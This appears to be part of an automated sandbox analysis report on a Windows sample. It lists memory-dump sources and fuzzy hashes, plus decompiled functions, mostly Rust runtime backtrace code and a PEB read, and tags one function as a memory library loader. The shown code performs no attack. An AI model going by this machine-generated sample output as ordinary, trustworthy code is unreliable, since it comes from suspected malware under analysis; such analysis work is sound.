IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6E44A59A

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: da164faf4b023cf59e360d880572b257dcfef528f702816cb735b24efca9f26c
Instruction ID: dcbb9adc1f12007f55e0183f8ccabce3b58bd0147f078f9be4cb1e69fccdf8b9
Opcode Fuzzy Hash: da164faf4b023cf59e360d880572b257dcfef528f702816cb735b24efca9f26c
Instruction Fuzzy Hash: CF516AB1A11606CFEB54CFA5D991B9ABBF0FB4A360F10842AC459EB344E374E940DF50

Uniqueness

Uniqueness Score: -1.00%

Function 6E450927, Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36cb83a4504c06ce3f88a788a4062aea364c15c8edc948675d1f983eedc8ebc2
Instruction ID: 45157b39a04289be5b117481788bb8e89cbd8e9d6f6d412d7a0c45508fe80f83
Opcode Fuzzy Hash: 36cb83a4504c06ce3f88a788a4062aea364c15c8edc948675d1f983eedc8ebc2
Instruction Fuzzy Hash: 6F41927980421DAEDB50DFB9CC98EEABBB9AF45308F1442DEE40893301E6319E548F50

Uniqueness

Uniqueness Score: -1.00%

Function 6E449920, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cef578456499f09dad00e09e978af775d3652d91dfa29263b1fe6a4047af500
Instruction ID: 922c618c8a1b090c1358d6465c5f75e26852e5828cc468b892a48cbee3409377
Opcode Fuzzy Hash: 1cef578456499f09dad00e09e978af775d3652d91dfa29263b1fe6a4047af500
Instruction Fuzzy Hash: 86016932311102CFE798CFA8C6A0E2AB3E6FF49654F5444AAD516CB725DB32EC00EA40

Uniqueness

Uniqueness Score: -1.00%

Function 6E4502CC, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6eb6665ddb3350983e42d1cbc670fa1f7b7e34ee61cedf1b9ad9aa5777005a93
Instruction ID: 346217c727cb9731194d966b339bf13576ce99565fbf1c1b6962f8177fbc4632
Opcode Fuzzy Hash: 6eb6665ddb3350983e42d1cbc670fa1f7b7e34ee61cedf1b9ad9aa5777005a93
Instruction Fuzzy Hash: 25E08C72911238EBCB10CBE8C940E8AF3ECEB45A84B11089BF511D3300D2B4DE00C7C0

Uniqueness

Uniqueness Score: -1.00%

Function 6E44EC0B, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8280ca142bc1b3d81a1ec9e0318d957c7d25c74bfd8627c95e038b2adada9f26
Instruction ID: 22a44e50251e8973780033618d54660217cee57dfa4b58822c1ba07835b1b4d0
Opcode Fuzzy Hash: 8280ca142bc1b3d81a1ec9e0318d957c7d25c74bfd8627c95e038b2adada9f26
Instruction Fuzzy Hash: A8C08C7860190086DE05D97092B0FA47368F382786F902C8EC8464F782E61EBC87D600

Uniqueness

Uniqueness Score: -1.00%

Function 01ED07D2, Relevance: .0, Instructions: 2
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01ED07D2() {

				return  *[fs:0x30];
			}

0x01ed07d8

Memory Dump Source

Source File: 00000003.00000002.558061657.0000000001EC0000.00000040.00000001.sdmp, Offset: 01EC0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 6E43DEE0, Relevance: 42.5, APIs: 19, Strings: 5, Instructions: 451
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E6E43DEE0(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, long _a8) {
				void* _v16;
				char _v1456;
				void* __ebp;
				void _t191;
				void* _t194;
				long _t195;
				signed int _t200;
				void* _t201;
				void* _t204;
				void* _t205;
				long _t206;
				char _t208;
				void* _t217;
				void* _t218;
				void* _t221;
				void* _t227;
				void* _t229;
				void* _t233;
				void* _t235;
				void* _t241;
				void* _t243;
				void* _t244;
				void* _t246;
				void* _t250;
				void* _t252;
				long _t260;
				long _t262;
				void* _t263;
				void* _t264;
				char _t265;
				void* _t267;
				void* _t274;
				void* _t284;
				void* _t288;
				long _t291;
				WCHAR* _t293;
				void* _t294;
				WCHAR* _t304;
				long _t305;
				void* _t307;
				void* _t308;
				intOrPtr _t310;
				intOrPtr _t313;
				signed int _t315;
				intOrPtr _t317;
				void* _t318;
				void* _t322;
				void* _t324;

				_push(__ebx);
				_push(__edi);
				_push(__esi);
				_t317 = (_t315 & 0xfffffff0) - 0x5b0;
				_t310 = _t317;
				 *((intOrPtr*)(_t310 + 0x598)) = _t313;
				 *((intOrPtr*)(_t310 + 0x59c)) = _t317;
				 *(_t310 + 0x5a8) = 0xffffffff;
				 *((intOrPtr*)(_t310 + 0x5a4)) = E6E443B90;
				 *((intOrPtr*)(_t310 + 0x5a0)) =  *[fs:0x0];
				 *[fs:0x0] = _t310 + 0x5a0;
				_t191 =  *_a4;
				 *(_t310 + 0x28) = _t191;
				 *(_t310 + 0xe) = _t191;
				E6E44C310(__edi, _t310 + 0x190, 0, 0x400);
				_t318 = _t317 + 0xc;
				_t194 =  *0x6e47d0bc; // 0x2
				_t262 = 0x200;
				 *(_t310 + 0x24) = 0;
				 *(_t310 + 0x2c) = _t194;
				 *(_t310 + 0x30) = 0;
				 *(_t310 + 0x14) = _t194;
				 *(_t310 + 0x34) = 0;
				 *(_t310 + 0x10) = 0x200;
				if(0x200 >= 0x201) {
					L4:
					_t291 =  *(_t310 + 0x24);
					_t263 = _t262 - _t291;
					__eflags =  *(_t310 + 0x30) - _t291 - _t263;
					if( *(_t310 + 0x30) - _t291 < _t263) {
						 *(_t310 + 0x5a8) = 0;
						_t274 = _t310 + 0x2c;
						E6E457370(_t274, _t291, _t263);
						_t318 = _t318 + 4;
						 *(_t310 + 0x14) =  *(_t310 + 0x2c);
					}
					_t262 =  *(_t310 + 0x10);
					_t304 =  *(_t310 + 0x14);
					 *(_t310 + 0x34) = _t262;
					 *(_t310 + 0x24) = _t262;
					 *(_t310 + 0x20) = _t304;
					 *(_t310 + 0x1c) = _t262;
				} else {
					L7:
					_t304 = _t310 + 0x190;
					 *(_t310 + 0x1c) = 0x200;
					 *(_t310 + 0x20) = _t304;
				}
				L8:
				SetLastError(0);
				_t195 = GetCurrentDirectoryW(_t262, _t304);
				_t305 = _t195;
				if(_t195 != 0 || GetLastError() == 0) {
					if(_t305 != _t262 || GetLastError() != 0x7a) {
						__eflags = _t305 -  *(_t310 + 0x10);
						_t262 = _t305;
						if(_t305 <  *(_t310 + 0x10)) {
							_t292 =  *(_t310 + 0x1c);
							 *(_t310 + 0x5a8) = 0;
							__eflags = _t305 -  *(_t310 + 0x1c);
							if(__eflags > 0) {
								E6E456DB0(_t262, _t305, _t292, _t305, _t310, __eflags, 0x6e47ded0);
								goto L70;
							} else {
								_t293 =  *(_t310 + 0x20);
								_t274 = _t310 + 0x70;
								_push(_t305);
								E6E440EC0(_t262, _t274, _t293, _t305, _t310);
								_t318 = _t318 + 4;
								asm("movsd xmm0, [esi+0x70]");
								_t264 = 0;
								 *(_t310 + 0x48) =  *(_t310 + 0x78);
								asm("movsd [esi+0x40], xmm0");
								_t200 =  *(_t310 + 0x30);
								__eflags = _t200;
								if(_t200 != 0) {
									goto L18;
								} else {
								}
								goto L21;
							}
						} else {
							__eflags = _t262 - 0x201;
							 *(_t310 + 0x10) = _t262;
							if(_t262 < 0x201) {
								goto L7;
							} else {
								goto L4;
							}
							goto L8;
						}
					} else {
						_t262 =  *(_t310 + 0x10) +  *(_t310 + 0x10);
						 *(_t310 + 0x10) = _t262;
						if(_t262 >= 0x201) {
							goto L4;
						} else {
							goto L7;
						}
						goto L8;
					}
				} else {
					_t260 = GetLastError();
					_t264 = 1;
					 *(_t310 + 0x44) = _t260;
					 *(_t310 + 0x40) = 0;
					_t200 =  *(_t310 + 0x30);
					__eflags = _t200;
					if(_t200 != 0) {
						L18:
						__eflags =  *(_t310 + 0x14);
						if( *(_t310 + 0x14) != 0) {
							__eflags = _t200 & 0x7fffffff;
							if((_t200 & 0x7fffffff) != 0) {
								HeapFree( *0x6e48adc8, 0,  *(_t310 + 0x14));
							}
						}
					}
					L21:
					__eflags = _t264;
					if(_t264 == 0) {
						_t201 =  *(_t310 + 0x40);
						_t274 =  *(_t310 + 0x44);
						_t293 =  *(_t310 + 0x48);
						_t265 =  *(_t310 + 0x28);
						 *(_t310 + 0x5a8) = 2;
					} else {
						__eflags =  *(_t310 + 0x40) - 3;
						if( *(_t310 + 0x40) == 3) {
							_t288 =  *(_t310 + 0x44);
							 *(_t310 + 0x10) = _t288;
							 *(_t310 + 0x5a8) = 1;
							 *((intOrPtr*)( *((intOrPtr*)(_t288 + 4))))( *_t288);
							_t318 = _t318 + 4;
							_t250 =  *(_t310 + 0x10);
							_t274 =  *(_t250 + 4);
							__eflags =  *(_t274 + 4);
							if( *(_t274 + 4) != 0) {
								_t252 =  *_t250;
								__eflags =  *((intOrPtr*)(_t274 + 8)) - 9;
								if( *((intOrPtr*)(_t274 + 8)) >= 9) {
									_t252 =  *(_t252 - 4);
								}
								HeapFree( *0x6e48adc8, 0, _t252);
								_t250 =  *(_t310 + 0x44);
							}
							HeapFree( *0x6e48adc8, 0, _t250);
						}
						_t265 =  *(_t310 + 0xe);
						_t201 = 0;
						 *(_t310 + 0x5a8) = 2;
					}
					 *((char*)(_t310 + 0x68)) = _t265;
					 *(_t310 + 0x5c) = _t201;
					 *(_t310 + 0x64) = _t293;
					 *(_t310 + 0x60) = _t274;
					 *(_t310 + 0x190) = 0x6e47d5c8;
					 *(_t310 + 0x194) = 1;
					 *(_t310 + 0x198) = 0;
					 *((intOrPtr*)(_t310 + 0x1a0)) = 0x6e47cd60;
					 *(_t310 + 0x1a4) = 0;
					_t294 =  *(_a8 + 0x1c);
					_push(_t310 + 0x190);
					_t204 = E6E432320( *((intOrPtr*)(_a8 + 0x18)), _t294);
					_t322 = _t318 + 4;
					__eflags = _t204;
					if(_t204 != 0) {
						L50:
						_t205 =  *(_t310 + 0x5c);
						__eflags = _t205;
						if(_t205 != 0) {
							__eflags =  *(_t310 + 0x60);
							if( *(_t310 + 0x60) != 0) {
								HeapFree( *0x6e48adc8, 0, _t205);
							}
						}
						_t206 = 1;
						goto L54;
					} else {
						_t208 =  *(_t310 + 0xe);
						 *(_t310 + 0x6c) = 0;
						 *((char*)(_t310 + 0xf)) = 0;
						 *(_t310 + 0x40) = _a8;
						 *(_t310 + 0x44) = 0;
						__eflags = _t208;
						 *((char*)(_t310 + 0x50)) = _t208;
						 *(_t310 + 0x2c) = _t310 + 0xe;
						 *(_t310 + 0x48) = _t310 + 0x5c;
						 *((intOrPtr*)(_t310 + 0x4c)) = 0x6e47d5d0;
						 *(_t310 + 0x1b) = _t208 != 0;
						 *(_t310 + 0x30) = _t310 + 0x6c;
						 *(_t310 + 0x34) = _t310 + 0x1b;
						 *((intOrPtr*)(_t310 + 0x38)) = _t310 + 0xf;
						 *((intOrPtr*)(_t310 + 0x3c)) = _t310 + 0x40;
						 *(_t310 + 0x10) = GetCurrentProcess();
						 *(_t310 + 0x24) = GetCurrentThread();
						_t307 = _t310 + 0x190;
						E6E44C310(_t307, _t307, 0, 0x2d0);
						_t324 = _t322 + 0xc;
						_push(_t307);
						L6E449EEE();
						_t217 = E6E43E690(_t265, _t307, _t310);
						__eflags = _t217;
						if(_t217 == 0) {
							_t308 =  *0x6e48ade8; // 0x0
							 *(_t310 + 0x58) = _t294;
							__eflags = _t308;
							if(_t308 == 0) {
								_t218 = GetProcAddress( *0x6e48add0, "SymFunctionTableAccess64");
								__eflags = _t218;
								if(__eflags == 0) {
									 *(_t310 + 0x5a8) = 3;
									E6E456E20(_t265, "called `Option::unwrap()` on a `None` value", 0x2b, _t308, _t310, __eflags, 0x6e47e2c0);
									goto L70;
								} else {
									_t308 = _t218;
									 *0x6e48ade8 = _t218;
									_t267 =  *0x6e48adec; // 0x0
									__eflags = _t267;
									if(_t267 != 0) {
										goto L41;
									} else {
										goto L39;
									}
								}
							} else {
								_t267 =  *0x6e48adec; // 0x0
								__eflags = _t267;
								if(_t267 != 0) {
									L41:
									 *(_t310 + 0x20) = GetCurrentProcess();
									_t221 =  *0x6e48adf8; // 0x0
									 *(_t310 + 0x1c) = _t308;
									 *(_t310 + 0x14) = _t267;
									__eflags = _t221;
									if(_t221 != 0) {
										L44:
										 *(_t310 + 0x28) = _t221;
										 *(_t310 + 0x74) = 0;
										 *(_t310 + 0x70) = 0;
										E6E44C310(_t308, _t310 + 0x80, 0, 0x10c);
										_t324 = _t324 + 0xc;
										 *(_t310 + 0x7c) = 0;
										 *(_t310 + 0x78) =  *(_t310 + 0x248);
										 *(_t310 + 0x84) = 3;
										 *((intOrPtr*)(_t310 + 0xa8)) =  *((intOrPtr*)(_t310 + 0x254));
										 *(_t310 + 0xac) = 0;
										 *(_t310 + 0xb4) = 3;
										 *((intOrPtr*)(_t310 + 0x98)) =  *((intOrPtr*)(_t310 + 0x244));
										 *(_t310 + 0x9c) = 0;
										 *(_t310 + 0xa4) = 3;
										while(1) {
											_t227 =  *(_t310 + 0x28)(0x14c,  *(_t310 + 0x10),  *(_t310 + 0x24), _t310 + 0x78, _t310 + 0x190, 0, _t308, _t267, 0, 0);
											__eflags = _t227 - 1;
											if(_t227 != 1) {
												goto L47;
											}
											 *(_t310 + 0x188) =  *_t267( *(_t310 + 0x20),  *(_t310 + 0x78), 0);
											 *(_t310 + 0x5a8) = 3;
											_t235 = E6E43E890(_t267, _t310 + 0x2c, _t310 + 0x70, _t308, _t310);
											_t308 =  *(_t310 + 0x1c);
											_t267 =  *(_t310 + 0x14);
											__eflags = _t235;
											if(_t235 != 0) {
												continue;
											}
											goto L47;
										}
										goto L47;
									} else {
										_t221 = GetProcAddress( *0x6e48add0, "StackWalkEx");
										__eflags = _t221;
										if(_t221 == 0) {
											E6E44C310(_t308, _t310 + 0x80, 0, 0x100);
											_t324 = _t324 + 0xc;
											 *(_t310 + 0x74) = 0;
											 *(_t310 + 0x70) = 1;
											 *(_t310 + 0x188) = 0;
											 *(_t310 + 0x7c) = 0;
											 *(_t310 + 0x78) =  *(_t310 + 0x248);
											 *(_t310 + 0x84) = 3;
											 *((intOrPtr*)(_t310 + 0xa8)) =  *((intOrPtr*)(_t310 + 0x254));
											 *(_t310 + 0xac) = 0;
											 *(_t310 + 0xb4) = 3;
											 *((intOrPtr*)(_t310 + 0x98)) =  *((intOrPtr*)(_t310 + 0x244));
											 *(_t310 + 0x9c) = 0;
											 *(_t310 + 0xa4) = 3;
											do {
												_t284 =  *0x6e48ade4; // 0x0
												__eflags = _t284;
												if(_t284 != 0) {
													L63:
													_t241 =  *_t284(0x14c,  *(_t310 + 0x10),  *(_t310 + 0x24), _t310 + 0x78, _t310 + 0x190, 0, _t308, _t267, 0);
													__eflags = _t241 - 1;
													if(_t241 != 1) {
														L47:
														ReleaseMutex( *(_t310 + 0x58));
														__eflags =  *((char*)(_t310 + 0xf));
														if( *((char*)(_t310 + 0xf)) != 0) {
															goto L50;
														} else {
															goto L48;
														}
														goto L54;
													} else {
														goto L64;
													}
												} else {
													_t244 = GetProcAddress( *0x6e48add0, "StackWalk64");
													__eflags = _t244;
													if(__eflags == 0) {
														 *(_t310 + 0x5a8) = 3;
														E6E456E20(_t267, "called `Option::unwrap()` on a `None` value", 0x2b, _t308, _t310, __eflags, 0x6e47e2c0);
														goto L70;
													} else {
														_t284 = _t244;
														 *0x6e48ade4 = _t244;
														goto L63;
													}
												}
												goto L71;
												L64:
												 *(_t310 + 0x188) =  *_t267( *(_t310 + 0x20),  *(_t310 + 0x78), 0);
												 *(_t310 + 0x5a8) = 3;
												_t243 = E6E43E890(_t267, _t310 + 0x2c, _t310 + 0x70, _t308, _t310);
												_t308 =  *(_t310 + 0x1c);
												_t267 =  *(_t310 + 0x14);
												__eflags = _t243;
											} while (_t243 != 0);
											goto L47;
										} else {
											 *0x6e48adf8 = _t221;
											goto L44;
										}
									}
								} else {
									L39:
									_t246 = GetProcAddress( *0x6e48add0, "SymGetModuleBase64");
									__eflags = _t246;
									if(__eflags == 0) {
										 *(_t310 + 0x5a8) = 3;
										E6E456E20(_t267, "called `Option::unwrap()` on a `None` value", 0x2b, _t308, _t310, __eflags, 0x6e47e2c0);
										L70:
										asm("ud2");
										_push(_t313);
										return E6E43E880( *((intOrPtr*)( &_v1456 + 0x58)));
									} else {
										_t267 = _t246;
										 *0x6e48adec = _t246;
										goto L41;
									}
								}
							}
						} else {
							__eflags =  *((char*)(_t310 + 0xf));
							if( *((char*)(_t310 + 0xf)) != 0) {
								goto L50;
							} else {
								L48:
								__eflags =  *(_t310 + 0xe);
								if( *(_t310 + 0xe) != 0) {
									L55:
									_t229 =  *(_t310 + 0x5c);
									__eflags = _t229;
									if(_t229 != 0) {
										__eflags =  *(_t310 + 0x60);
										if( *(_t310 + 0x60) != 0) {
											HeapFree( *0x6e48adc8, 0, _t229);
										}
									}
									_t206 = 0;
								} else {
									 *(_t310 + 0x190) = 0x6e47d63c;
									 *(_t310 + 0x194) = 1;
									 *(_t310 + 0x198) = 0;
									 *((intOrPtr*)(_t310 + 0x1a0)) = 0x6e47cd60;
									 *(_t310 + 0x1a4) = 0;
									 *(_t310 + 0x5a8) = 2;
									_push(_t310 + 0x190);
									_t233 = E6E432320( *((intOrPtr*)(_a8 + 0x18)),  *(_a8 + 0x1c));
									__eflags = _t233;
									if(_t233 == 0) {
										goto L55;
									} else {
										goto L50;
									}
								}
							}
							L54:
							 *[fs:0x0] =  *((intOrPtr*)(_t310 + 0x5a0));
							return _t206;
						}
					}
				}
				L71:
			}

0x6e43dee3
0x6e43dee4
0x6e43dee5
0x6e43dee9
0x6e43deef
0x6e43def1
0x6e43def7
0x6e43defd
0x6e43df07
0x6e43df21
0x6e43df27
0x6e43df2e
0x6e43df30
0x6e43df33
0x6e43df44
0x6e43df49
0x6e43df4c
0x6e43df51
0x6e43df56
0x6e43df5d
0x6e43df60
0x6e43df67
0x6e43df6a
0x6e43df77
0x6e43df7a
0x6e43df96
0x6e43df96
0x6e43df9c
0x6e43dfa0
0x6e43dfa2
0x6e43dfa4
0x6e43dfae
0x6e43dfb2
0x6e43dfb7
0x6e43dfbd
0x6e43dfbd
0x6e43dfc0
0x6e43dfc3
0x6e43dfc6
0x6e43dfc9
0x6e43dfcc
0x6e43dfcf
0x6e43df7c
0x6e43dfe0
0x6e43dfe0
0x6e43dfe6
0x6e43dfed
0x6e43dfed
0x6e43dff0
0x6e43dff2
0x6e43dffa
0x6e43e000
0x6e43e004
0x6e43e012
0x6e43df80
0x6e43df83
0x6e43df85
0x6e43e03d
0x6e43e040
0x6e43e04a
0x6e43e04c
0x6e43e568
0x00000000
0x6e43e052
0x6e43e052
0x6e43e055
0x6e43e058
0x6e43e059
0x6e43e05e
0x6e43e064
0x6e43e069
0x6e43e06b
0x6e43e06e
0x6e43e073
0x6e43e076
0x6e43e078
0x00000000
0x00000000
0x6e43e07a
0x00000000
0x6e43e078
0x6e43df8b
0x6e43df8b
0x6e43df91
0x6e43df94
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e43df94
0x6e43e027
0x6e43e02a
0x6e43e032
0x6e43e035
0x00000000
0x6e43e03b
0x00000000
0x6e43e03b
0x00000000
0x6e43e035
0x6e43e07c
0x6e43e07c
0x6e43e082
0x6e43e084
0x6e43e087
0x6e43e08e
0x6e43e091
0x6e43e093
0x6e43e095
0x6e43e095
0x6e43e099
0x6e43e09b
0x6e43e0a0
0x6e43e0ad
0x6e43e0ad
0x6e43e0a0
0x6e43e099
0x6e43e0b2
0x6e43e0b2
0x6e43e0b4
0x6e43e11e
0x6e43e121
0x6e43e124
0x6e43e127
0x6e43e12a
0x6e43e0b6
0x6e43e0b6
0x6e43e0ba
0x6e43e0bc
0x6e43e0c1
0x6e43e0c7
0x6e43e0d2
0x6e43e0d4
0x6e43e0d7
0x6e43e0da
0x6e43e0dd
0x6e43e0e1
0x6e43e0e3
0x6e43e0e5
0x6e43e0e9
0x6e43e0eb
0x6e43e0eb
0x6e43e0f7
0x6e43e0fc
0x6e43e0fc
0x6e43e108
0x6e43e108
0x6e43e10d
0x6e43e110
0x6e43e112
0x6e43e112
0x6e43e134
0x6e43e137
0x6e43e13d
0x6e43e140
0x6e43e143
0x6e43e14d
0x6e43e157
0x6e43e161
0x6e43e16b
0x6e43e178
0x6e43e181
0x6e43e182
0x6e43e187
0x6e43e18a
0x6e43e18c
0x6e43e405
0x6e43e405
0x6e43e408
0x6e43e40a
0x6e43e40c
0x6e43e410
0x6e43e41b
0x6e43e41b
0x6e43e410
0x6e43e420
0x00000000
0x6e43e192
0x6e43e192
0x6e43e198
0x6e43e19f
0x6e43e1a3
0x6e43e1a6
0x6e43e1ad
0x6e43e1af
0x6e43e1b8
0x6e43e1be
0x6e43e1c1
0x6e43e1c8
0x6e43e1cc
0x6e43e1d2
0x6e43e1d8
0x6e43e1de
0x6e43e1e6
0x6e43e1ef
0x6e43e1f9
0x6e43e200
0x6e43e205
0x6e43e208
0x6e43e209
0x6e43e20e
0x6e43e213
0x6e43e215
0x6e43e226
0x6e43e22c
0x6e43e22f
0x6e43e231
0x6e43e24a
0x6e43e250
0x6e43e252
0x6e43e595
0x6e43e5ae
0x00000000
0x6e43e258
0x6e43e258
0x6e43e25a
0x6e43e25f
0x6e43e265
0x6e43e267
0x00000000
0x00000000
0x00000000
0x00000000
0x6e43e267
0x6e43e233
0x6e43e233
0x6e43e239
0x6e43e23b
0x6e43e289
0x6e43e28e
0x6e43e291
0x6e43e296
0x6e43e299
0x6e43e29c
0x6e43e29e
0x6e43e2be
0x6e43e2be
0x6e43e2c7
0x6e43e2ce
0x6e43e2dd
0x6e43e2e2
0x6e43e2f7
0x6e43e2fe
0x6e43e301
0x6e43e30b
0x6e43e311
0x6e43e31b
0x6e43e325
0x6e43e32b
0x6e43e335
0x6e43e340
0x6e43e35e
0x6e43e361
0x6e43e364
0x00000000
0x00000000
0x6e43e376
0x6e43e37c
0x6e43e386
0x6e43e38b
0x6e43e38e
0x6e43e391
0x6e43e393
0x00000000
0x00000000
0x00000000
0x6e43e393
0x00000000
0x6e43e2a0
0x6e43e2ab
0x6e43e2b1
0x6e43e2b3
0x6e43e464
0x6e43e469
0x6e43e47e
0x6e43e485
0x6e43e48c
0x6e43e496
0x6e43e49d
0x6e43e4a0
0x6e43e4aa
0x6e43e4b0
0x6e43e4ba
0x6e43e4c4
0x6e43e4ca
0x6e43e4d4
0x6e43e4e0
0x6e43e4e0
0x6e43e4e6
0x6e43e4e8
0x6e43e506
0x6e43e522
0x6e43e524
0x6e43e527
0x6e43e395
0x6e43e398
0x6e43e39d
0x6e43e3a1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e43e4ea
0x6e43e4f5
0x6e43e4fb
0x6e43e4fd
0x6e43e572
0x6e43e58b
0x00000000
0x6e43e4ff
0x6e43e4ff
0x6e43e501
0x00000000
0x6e43e501
0x6e43e4fd
0x00000000
0x6e43e52d
0x6e43e53d
0x6e43e543
0x6e43e54d
0x6e43e552
0x6e43e555
0x6e43e558
0x6e43e558
0x00000000
0x6e43e2b9
0x6e43e2b9
0x00000000
0x6e43e2b9
0x6e43e2b3
0x6e43e23d
0x6e43e269
0x6e43e274
0x6e43e27a
0x6e43e27c
0x6e43e5b8
0x6e43e5d1
0x6e43e5d9
0x6e43e5d9
0x6e43e5e0
0x6e43e5fc
0x6e43e282
0x6e43e282
0x6e43e284
0x00000000
0x6e43e284
0x6e43e27c
0x6e43e23b
0x6e43e217
0x6e43e217
0x6e43e21b
0x00000000
0x6e43e221
0x6e43e3a3
0x6e43e3a3
0x6e43e3a7
0x6e43e437
0x6e43e437
0x6e43e43a
0x6e43e43c
0x6e43e43e
0x6e43e442
0x6e43e44d
0x6e43e44d
0x6e43e442
0x6e43e452
0x6e43e3ad
0x6e43e3b0
0x6e43e3ba
0x6e43e3c4
0x6e43e3ce
0x6e43e3d8
0x6e43e3e2
0x6e43e3f8
0x6e43e3f9
0x6e43e401
0x6e43e403
0x00000000
0x00000000
0x00000000
0x00000000
0x6e43e403
0x6e43e3a7
0x6e43e422
0x6e43e428
0x6e43e436
0x6e43e436
0x6e43e215
0x6e43e18c
0x00000000

APIs

SetLastError.KERNEL32(00000000), ref: 6E43DFF2
GetCurrentDirectoryW.KERNEL32(?,?), ref: 6E43DFFA
GetLastError.KERNEL32 ref: 6E43E006
GetLastError.KERNEL32 ref: 6E43E018
GetLastError.KERNEL32 ref: 6E43E07C
HeapFree.KERNEL32(00000000,00000000), ref: 6E43E0AD
HeapFree.KERNEL32(00000000,?), ref: 6E43E0F7
HeapFree.KERNEL32(00000000,?), ref: 6E43E108
GetCurrentProcess.KERNEL32(?), ref: 6E43E1E1
GetCurrentThread.KERNEL32(?), ref: 6E43E1E9
RtlCaptureContext.KERNEL32(?), ref: 6E43E209
GetProcAddress.KERNEL32(SymFunctionTableAccess64,?), ref: 6E43E24A
GetProcAddress.KERNEL32(SymGetModuleBase64), ref: 6E43E274
GetCurrentProcess.KERNEL32 ref: 6E43E289
GetProcAddress.KERNEL32(StackWalkEx), ref: 6E43E2AB
ReleaseMutex.KERNEL32(?), ref: 6E43E398
HeapFree.KERNEL32(00000000,?), ref: 6E43E41B
HeapFree.KERNEL32(00000000,?,?), ref: 6E43E44D
GetProcAddress.KERNEL32(StackWalk64), ref: 6E43E4F5

Strings

SymGetModuleBase64, xrefs: 6E43E269
SymFunctionTableAccess64, xrefs: 6E43E23F
StackWalkEx, xrefs: 6E43E2A0
StackWalk64, xrefs: 6E43E4EA
called `Option::unwrap()` on a `None` value, xrefs: 6E43E57C, 6E43E59F, 6E43E5C2

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap$AddressCurrentErrorLastProc$Process$CaptureContextDirectoryMutexReleaseThread
String ID: StackWalk64$StackWalkEx$SymFunctionTableAccess64$SymGetModuleBase64$called `Option::unwrap()` on a `None` value
API String ID: 1381040140-1036201984
